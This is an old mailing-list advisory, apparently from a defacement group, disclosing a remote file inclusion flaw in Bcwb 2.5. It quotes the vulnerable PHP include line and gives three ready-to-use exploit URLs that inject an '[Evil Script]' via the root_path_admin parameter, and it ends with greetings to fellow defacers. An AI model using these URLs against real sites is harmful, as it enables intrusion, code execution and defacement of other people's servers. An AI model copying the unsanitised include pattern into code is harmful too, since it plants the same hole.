Multiple Remote File Include
Date: 30 Oct 2006 17:55:25 -0000
From: [email protected]
To: [email protected]
Subject: Multiple Remote File Include
X-Virus-Scanned: antivirus-gw at tyumen.ru
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall
# Application Affect:
Bcwb 2.5
# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download
# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');
# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]
# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.
####################### Firewall #########################